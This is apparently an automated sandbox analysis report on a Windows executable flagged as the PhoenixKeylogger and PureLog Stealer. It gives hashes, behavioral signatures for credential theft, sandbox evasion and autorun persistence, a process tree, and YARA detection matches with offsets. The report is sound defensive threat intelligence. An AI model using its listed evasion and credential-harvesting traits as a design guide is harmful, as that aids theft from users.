Edit tour

Windows Analysis Report
6Ek4nfs2y1.exe

Overview

General Information

Sample name:	6Ek4nfs2y1.exe renamed because original name is a hash value
Original sample name:	c2d87b5b3c906a6725f420ee3e5cb28a81bcc756b1935d6875578bbc73978687.exe
Analysis ID:	1467001
MD5:	21ccb2cd9a4fbc259ab1110bc687b960
SHA1:	10d68517383a76dd23e172c1f02a74cadf104b34
SHA256:	c2d87b5b3c906a6725f420ee3e5cb28a81bcc756b1935d6875578bbc73978687
Tags:	exe
Infos:

Detection

PhoenixKeylogger, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected PhoenixKeylogger

Yara detected PureLog Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

Machine Learning detection for dropped file

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

6Ek4nfs2y1.exe (PID: 7364 cmdline: "C:\Users\user\Desktop\6Ek4nfs2y1.exe" MD5: 21CCB2CD9A4FBC259AB1110BC687B960)

6Ek4nfs2y1.exe (PID: 7912 cmdline: "C:\Users\user\Desktop\6Ek4nfs2y1.exe" MD5: 21CCB2CD9A4FBC259AB1110BC687B960)

Qulzerug.exe (PID: 8060 cmdline: "C:\Users\user\AppData\Roaming\Qulzerug.exe" MD5: 21CCB2CD9A4FBC259AB1110BC687B960)

Qulzerug.exe (PID: 7536 cmdline: "C:\Users\user\AppData\Roaming\Qulzerug.exe" MD5: 21CCB2CD9A4FBC259AB1110BC687B960)

Qulzerug.exe (PID: 1816 cmdline: "C:\Users\user\AppData\Roaming\Qulzerug.exe" MD5: 21CCB2CD9A4FBC259AB1110BC687B960)

Qulzerug.exe (PID: 1384 cmdline: "C:\Users\user\AppData\Roaming\Qulzerug.exe" MD5: 21CCB2CD9A4FBC259AB1110BC687B960)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x18e9c:$m2: - Clipboard -------\| 0x19150:$m3: - Logs -------\| 0x19541:$m4: - Passwords -------\| 0x19579:$m5: PSWD 0x1917e:$m7: Logs \|
00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
00000000.00000002.1288077227.0000000002D74000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x192f0:$m2: - Clipboard -------\| 0x195a4:$m3: - Logs -------\| 0x19995:$m4: - Passwords -------\| 0x199cd:$m5: PSWD 0x195d2:$m7: Logs \|
0000000D.00000002.2506617896.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
0000000D.00000002.2506617896.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2507975182.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
00000008.00000002.2507975182.00000000030CD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1299183493.0000000005860000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3acda:$a1: get_encryptedPassword 0x3acae:$a2: get_encryptedUsername 0x3ad72:$a3: get_timePasswordChanged 0x3ac8a:$a4: get_passwordField 0x3acf0:$a5: set_encryptedPassword 0x3aab3:$a7: get_logins 0x39c7e:$a9: StartKeylogger 0x3a264:$a10: KeyLoggerEventArgs 0x3a1a9:$a11: KeyLoggerEventArgsEventHandler 0x3ab91:$a13: _encryptedPassword
00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x39c7e:$s2: StartKeylogger 0x3a733:$s3: CRYPTPROTECT_ 0x3a754:$s3: CRYPTPROTECT_ 0x3a773:$s3: CRYPTPROTECT_ 0x3e36c:$m2: - Clipboard -------\| 0x3e620:$m3: - Logs -------\| 0x3ea11:$m4: - Passwords -------\| 0x3ea49:$m5: PSWD 0x3e64e:$m7: Logs \|
0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x199d0:$m2: - Clipboard -------\| 0x19c84:$m3: - Logs -------\| 0x1a075:$m4: - Passwords -------\| 0x1a0ad:$m5: PSWD 0x19cb2:$m7: Logs \|
0000000D.00000002.2495878153.000000000040E000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x75ba:$a1: get_encryptedPassword 0x758e:$a2: get_encryptedUsername 0x7652:$a3: get_timePasswordChanged 0x756a:$a4: get_passwordField 0x75d0:$a5: set_encryptedPassword 0x7393:$a7: get_logins 0x655e:$a9: StartKeylogger 0x6b44:$a10: KeyLoggerEventArgs 0x6a89:$a11: KeyLoggerEventArgsEventHandler 0x7471:$a13: _encryptedPassword
00000009.00000002.1552321721.00000000067C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000002.2495830056.0000000000418000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0xc4c:$m2: - Clipboard -------\| 0xf00:$m3: - Logs -------\| 0xf2e:$m7: Logs \|
00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000002.2509279792.00000000034D7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
0000000C.00000002.2509279792.00000000034D7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x11fcf2:$a1: get_encryptedPassword 0x11fcc6:$a2: get_encryptedUsername 0x11fd8a:$a3: get_timePasswordChanged 0x11fca2:$a4: get_passwordField 0x11fd08:$a5: set_encryptedPassword 0x11facb:$a7: get_logins 0x11ec96:$a9: StartKeylogger 0x11f27c:$a10: KeyLoggerEventArgs 0x11f1c1:$a11: KeyLoggerEventArgsEventHandler 0x11fba9:$a13: _encryptedPassword
0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x11ec96:$s2: StartKeylogger 0x11f74b:$s3: CRYPTPROTECT_ 0x11f76c:$s3: CRYPTPROTECT_ 0x11f78b:$s3: CRYPTPROTECT_ 0x123384:$m2: - Clipboard -------\| 0x123638:$m3: - Logs -------\| 0x123a29:$m4: - Passwords -------\| 0x123a61:$m5: PSWD 0x123666:$m7: Logs \|
0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000B.00000002.1571676303.0000000006230000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000B.00000002.1571676303.0000000006230000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1288077227.00000000029B8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cfa6a:$a1: get_encryptedPassword 0x3cfa3e:$a2: get_encryptedUsername 0x3cfb02:$a3: get_timePasswordChanged 0x3cfa1a:$a4: get_passwordField 0x3cfa80:$a5: set_encryptedPassword 0x3cf843:$a7: get_logins 0x3cea0e:$a9: StartKeylogger 0x3ceff4:$a10: KeyLoggerEventArgs 0x3cef39:$a11: KeyLoggerEventArgsEventHandler 0x3cf921:$a13: _encryptedPassword
00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x3cea0e:$s2: StartKeylogger 0x3cf4c3:$s3: CRYPTPROTECT_ 0x3cf4e4:$s3: CRYPTPROTECT_ 0x3cf503:$s3: CRYPTPROTECT_ 0x3d30fc:$m2: - Clipboard -------\| 0x3d33b0:$m3: - Logs -------\| 0x3d37a1:$m4: - Passwords -------\| 0x3d37d9:$m5: PSWD 0x3d33de:$m7: Logs \|
00000000.00000002.1310836981.00000000075A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.1526328229.0000000003AF8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x11fd1a:$a1: get_encryptedPassword 0x11fcee:$a2: get_encryptedUsername 0x11fdb2:$a3: get_timePasswordChanged 0x11fcca:$a4: get_passwordField 0x11fd30:$a5: set_encryptedPassword 0x11faf3:$a7: get_logins 0x11ecbe:$a9: StartKeylogger 0x11f2a4:$a10: KeyLoggerEventArgs 0x11f1e9:$a11: KeyLoggerEventArgsEventHandler 0x11fbd1:$a13: _encryptedPassword
00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x11ecbe:$s2: StartKeylogger 0x11f773:$s3: CRYPTPROTECT_ 0x11f794:$s3: CRYPTPROTECT_ 0x11f7b3:$s3: CRYPTPROTECT_ 0x1233ac:$m2: - Clipboard -------\| 0x123660:$m3: - Logs -------\| 0x123a51:$m4: - Passwords -------\| 0x123a89:$m5: PSWD 0x12368e:$m7: Logs \|
0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x80d972:$a1: get_encryptedPassword 0x80d946:$a2: get_encryptedUsername 0x80da0a:$a3: get_timePasswordChanged 0x80d922:$a4: get_passwordField 0x80d988:$a5: set_encryptedPassword 0x80d74b:$a7: get_logins 0x80c916:$a9: StartKeylogger 0x80cefc:$a10: KeyLoggerEventArgs 0x80ce41:$a11: KeyLoggerEventArgsEventHandler 0x80d829:$a13: _encryptedPassword
0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x80c916:$s2: StartKeylogger 0x80d3cb:$s3: CRYPTPROTECT_ 0x80d3ec:$s3: CRYPTPROTECT_ 0x80d40b:$s3: CRYPTPROTECT_ 0x811004:$m2: - Clipboard -------\| 0x8112b8:$m3: - Logs -------\| 0x8116a9:$m4: - Passwords -------\| 0x8116e1:$m5: PSWD 0x8112e6:$m7: Logs \|
00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x80da72:$a1: get_encryptedPassword 0x80da46:$a2: get_encryptedUsername 0x80db0a:$a3: get_timePasswordChanged 0x80da22:$a4: get_passwordField 0x80da88:$a5: set_encryptedPassword 0x80d84b:$a7: get_logins 0x80ca16:$a9: StartKeylogger 0x80cffc:$a10: KeyLoggerEventArgs 0x80cf41:$a11: KeyLoggerEventArgsEventHandler 0x80d929:$a13: _encryptedPassword
00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x80ca16:$s2: StartKeylogger 0x80d4cb:$s3: CRYPTPROTECT_ 0x80d4ec:$s3: CRYPTPROTECT_ 0x80d50b:$s3: CRYPTPROTECT_ 0x811104:$m2: - Clipboard -------\| 0x8113b8:$m3: - Logs -------\| 0x8117a9:$m4: - Passwords -------\| 0x8117e1:$m5: PSWD 0x8113e6:$m7: Logs \|
00000000.00000002.1300542157.0000000006441000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1300542157.0000000006441000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: 6Ek4nfs2y1.exe PID: 7364	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: 6Ek4nfs2y1.exe PID: 7364	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
Process Memory Space: 6Ek4nfs2y1.exe PID: 7364	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 6Ek4nfs2y1.exe PID: 7364	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x45771:$a1: get_encryptedPassword 0x253b01:$a1: get_encryptedPassword 0x45745:$a2: get_encryptedUsername 0x253ad5:$a2: get_encryptedUsername 0x45809:$a3: get_timePasswordChanged 0x253b99:$a3: get_timePasswordChanged 0x45721:$a4: get_passwordField 0x253ab1:$a4: get_passwordField 0x45787:$a5: set_encryptedPassword 0x253b17:$a5: set_encryptedPassword 0x2538e3:$a7: get_logins 0x25275c:$a9: StartKeylogger 0x252ebc:$a10: KeyLoggerEventArgs 0x252e44:$a11: KeyLoggerEventArgsEventHandler 0x45628:$a13: _encryptedPassword 0x2539b8:$a13: _encryptedPassword
Process Memory Space: 6Ek4nfs2y1.exe PID: 7364	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x25275c:$s2: StartKeylogger 0x25355e:$s3: CRYPTPROTECT_ 0x25357f:$s3: CRYPTPROTECT_ 0x25359e:$s3: CRYPTPROTECT_ 0x25363e:$s3: CRYPTPROTECT_ 0x25365e:$s3: CRYPTPROTECT_ 0x25367c:$s3: CRYPTPROTECT_ 0x49411:$m2: - Clipboard -------\| 0x2571ae:$m2: - Clipboard -------\| 0x4956b:$m3: - Logs -------\| 0x257308:$m3: - Logs -------\| 0x49762:$m4: - Passwords -------\| 0x2574ff:$m4: - Passwords -------\| 0x4977d:$m5: PSWD 0x25751a:$m5: PSWD 0x49581:$m7: Logs \| 0x25731e:$m7: Logs \|
Process Memory Space: 6Ek4nfs2y1.exe PID: 7912	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
Process Memory Space: 6Ek4nfs2y1.exe PID: 7912	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Qulzerug.exe PID: 8060	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Qulzerug.exe PID: 8060	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
Process Memory Space: Qulzerug.exe PID: 8060	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Qulzerug.exe PID: 8060	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x89210:$a1: get_encryptedPassword 0x988dc:$a1: get_encryptedPassword 0xdc4e9:$a1: get_encryptedPassword 0x891e4:$a2: get_encryptedUsername 0x988b0:$a2: get_encryptedUsername 0xdc4bd:$a2: get_encryptedUsername 0x892a8:$a3: get_timePasswordChanged 0x98974:$a3: get_timePasswordChanged 0xdc581:$a3: get_timePasswordChanged 0x891c0:$a4: get_passwordField 0x9888c:$a4: get_passwordField 0xdc499:$a4: get_passwordField 0x89226:$a5: set_encryptedPassword 0x988f2:$a5: set_encryptedPassword 0xdc4ff:$a5: set_encryptedPassword 0x88ff2:$a7: get_logins 0xdc2cb:$a7: get_logins 0x87ea0:$a9: StartKeylogger 0xdb136:$a9: StartKeylogger 0x885f4:$a10: KeyLoggerEventArgs 0xdb896:$a10: KeyLoggerEventArgs
Process Memory Space: Qulzerug.exe PID: 8060	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x87ea0:$s2: StartKeylogger 0xdb136:$s2: StartKeylogger 0x88c8e:$s3: CRYPTPROTECT_ 0x88caf:$s3: CRYPTPROTECT_ 0x88cce:$s3: CRYPTPROTECT_ 0x88d5d:$s3: CRYPTPROTECT_ 0x88d7d:$s3: CRYPTPROTECT_ 0x88d9b:$s3: CRYPTPROTECT_ 0xdbf40:$s3: CRYPTPROTECT_ 0xdbf61:$s3: CRYPTPROTECT_ 0xdbf80:$s3: CRYPTPROTECT_ 0xdc020:$s3: CRYPTPROTECT_ 0xdc040:$s3: CRYPTPROTECT_ 0xdc05e:$s3: CRYPTPROTECT_ 0x8c628:$m2: - Clipboard -------\| 0x9c57c:$m2: - Clipboard -------\| 0xdfc40:$m2: - Clipboard -------\| 0x8c782:$m3: - Logs -------\| 0x9c6d6:$m3: - Logs -------\| 0xdfd9a:$m3: - Logs -------\| 0x8c979:$m4: - Passwords -------\|
Process Memory Space: Qulzerug.exe PID: 1816	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Qulzerug.exe PID: 1816	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
Process Memory Space: Qulzerug.exe PID: 1816	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Qulzerug.exe PID: 1816	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4c211:$a1: get_encryptedPassword 0x116ee3:$a1: get_encryptedPassword 0x4c1e5:$a2: get_encryptedUsername 0x116eb7:$a2: get_encryptedUsername 0x4c2a9:$a3: get_timePasswordChanged 0x116f7b:$a3: get_timePasswordChanged 0x4c1c1:$a4: get_passwordField 0x116e93:$a4: get_passwordField 0x4c227:$a5: set_encryptedPassword 0x116ef9:$a5: set_encryptedPassword 0x4bff3:$a7: get_logins 0x4ae6c:$a9: StartKeylogger 0x4b5cc:$a10: KeyLoggerEventArgs 0x4b554:$a11: KeyLoggerEventArgsEventHandler 0x4c0c8:$a13: _encryptedPassword 0x116d9a:$a13: _encryptedPassword
Process Memory Space: Qulzerug.exe PID: 1816	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x4ae6c:$s2: StartKeylogger 0x4bc6e:$s3: CRYPTPROTECT_ 0x4bc8f:$s3: CRYPTPROTECT_ 0x4bcae:$s3: CRYPTPROTECT_ 0x4bd4e:$s3: CRYPTPROTECT_ 0x4bd6e:$s3: CRYPTPROTECT_ 0x4bd8c:$s3: CRYPTPROTECT_ 0x4f8be:$m2: - Clipboard -------\| 0x11ab83:$m2: - Clipboard -------\| 0x4fa18:$m3: - Logs -------\| 0x11acdd:$m3: - Logs -------\| 0x4fc0f:$m4: - Passwords -------\| 0x11aed4:$m4: - Passwords -------\| 0x4fc2a:$m5: PSWD 0x11aeef:$m5: PSWD 0x4fa2e:$m7: Logs \| 0x11acf3:$m7: Logs \|
Process Memory Space: Qulzerug.exe PID: 7536	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
Process Memory Space: Qulzerug.exe PID: 7536	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Qulzerug.exe PID: 7536	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x1f586:$m2: - Clipboard -------\| 0x1f6e0:$m3: - Logs -------\| 0x13178:$m4: - Passwords -------\| 0x13192:$m5: PSWD 0x1f6f6:$m7: Logs \|
Process Memory Space: Qulzerug.exe PID: 1384	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
Process Memory Space: Qulzerug.exe PID: 1384	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Qulzerug.exe PID: 1384	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bad6:$a1: get_encryptedPassword 0x2baaa:$a2: get_encryptedUsername 0x2bb6e:$a3: get_timePasswordChanged 0x2ba86:$a4: get_passwordField 0x2baec:$a5: set_encryptedPassword 0x2b8b8:$a7: get_logins 0x2a687:$a9: StartKeylogger 0x2ae67:$a10: KeyLoggerEventArgs 0x2adac:$a11: KeyLoggerEventArgsEventHandler 0x2b98d:$a13: _encryptedPassword
Click to see the 66 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.6Ek4nfs2y1.exe.5860000.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.2.Qulzerug.exe.4a24a70.4.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.6Ek4nfs2y1.exe.6a9e080.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.Qulzerug.exe.644f058.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.2.Qulzerug.exe.2e59a88.2.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.6Ek4nfs2y1.exe.2b9c980.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.2.Qulzerug.exe.49fca50.5.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.2.Qulzerug.exe.400000.0.unpack	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0x16e4c:$m2: - Clipboard -------\| 0x17100:$m3: - Logs -------\| 0x1712e:$m7: Logs \|
9.2.Qulzerug.exe.4a24a70.4.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.2.Qulzerug.exe.4a24a70.4.raw.unpack	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
9.2.Qulzerug.exe.4a24a70.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xbeffa:$a1: get_encryptedPassword 0xbefce:$a2: get_encryptedUsername 0xbf092:$a3: get_timePasswordChanged 0xbefaa:$a4: get_passwordField 0xbf010:$a5: set_encryptedPassword 0xbedd3:$a7: get_logins 0xbdf9e:$a9: StartKeylogger 0xbe584:$a10: KeyLoggerEventArgs 0xbe4c9:$a11: KeyLoggerEventArgsEventHandler 0xbeeb1:$a13: _encryptedPassword
9.2.Qulzerug.exe.4a24a70.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xbe692:$s1: UnHook 0xbe62e:$s2: SetHook 0xbe667:$s3: CallNextHook 0xbdd73:$s4: _hook
9.2.Qulzerug.exe.4a24a70.4.raw.unpack	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0xbdf9e:$s2: StartKeylogger 0xbea53:$s3: CRYPTPROTECT_ 0xbea74:$s3: CRYPTPROTECT_ 0xbea93:$s3: CRYPTPROTECT_ 0xc268c:$m2: - Clipboard -------\| 0xc2940:$m3: - Logs -------\| 0xc2d31:$m4: - Passwords -------\| 0xc2d69:$m5: PSWD 0xc296e:$m7: Logs \|
0.2.6Ek4nfs2y1.exe.2b9c980.2.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.Qulzerug.exe.29485bc.1.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
11.2.Qulzerug.exe.65aced8.5.raw.unpack	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
11.2.Qulzerug.exe.65aced8.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd9e1a:$a1: get_encryptedPassword 0xd9dee:$a2: get_encryptedUsername 0xd9eb2:$a3: get_timePasswordChanged 0xd9dca:$a4: get_passwordField 0xd9e30:$a5: set_encryptedPassword 0xd9bf3:$a7: get_logins 0xd8dbe:$a9: StartKeylogger 0xd93a4:$a10: KeyLoggerEventArgs 0xd92e9:$a11: KeyLoggerEventArgsEventHandler 0xd9cd1:$a13: _encryptedPassword
11.2.Qulzerug.exe.65aced8.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xd94b2:$s1: UnHook 0xd944e:$s2: SetHook 0xd9487:$s3: CallNextHook 0xd8b93:$s4: _hook
11.2.Qulzerug.exe.65aced8.5.raw.unpack	MALWARE_Win_Phoenix	Phoenix/404KeyLogger keylogger payload	ditekSHen	0xd8dbe:$s2: StartKeylogger 0xd9873:$s3: CRYPTPROTECT_ 0xd9894:$s3: CRYPTPROTECT_ 0xd98b3:$s3: CRYPTPROTECT_ 0xdd4ac:$m2: - Clipboard -------\| 0xdd760:$m3: - Logs -------\| 0xddb51:$m4: - Passwords -------\| 0xddb89:$m5: PSWD 0xdd78e:$m7: Logs \|
9.2.Qulzerug.exe.2e59a88.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.2.Qulzerug.exe.49fca50.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
9.2.Qulzerug.exe.49fca50.5.raw.unpack	JoeSecurity_PhoenixKeylogger	Yara detected PhoenixKeylogger	Joe Security
